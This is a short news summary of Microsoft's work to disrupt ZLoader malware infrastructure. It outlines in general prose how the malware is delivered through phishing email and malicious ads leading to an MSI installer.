Microsoft Analyzes & Disrupts Zloader
Microsoft Analyzes & Disrupts Zloader
Microsoft's efforts with telecommunications providers have enabled the takedown of various ZLoader infrastructure. Microsoft has provided intelligence on the various attack chains associated with ZLoader involving different techniques used to deliver the ZLoader payload. The first attack chain involves delivery through email containing a malicious link or attachment downloading the ZLoader payload. A second attack chain leverages Google Ads, popular advertising software tools and compromised legitimate domains to stage malicious content on subdomains. A malicious MSI downloaded and executed by the victim triggers PowerShell and scripts to download the ZLoader payload. With the ZLoader payload dropped from both chains, the modular malware typically creates persistence, downloads additional payloads, or initiates enumeration to fulfill the attacker's objectives.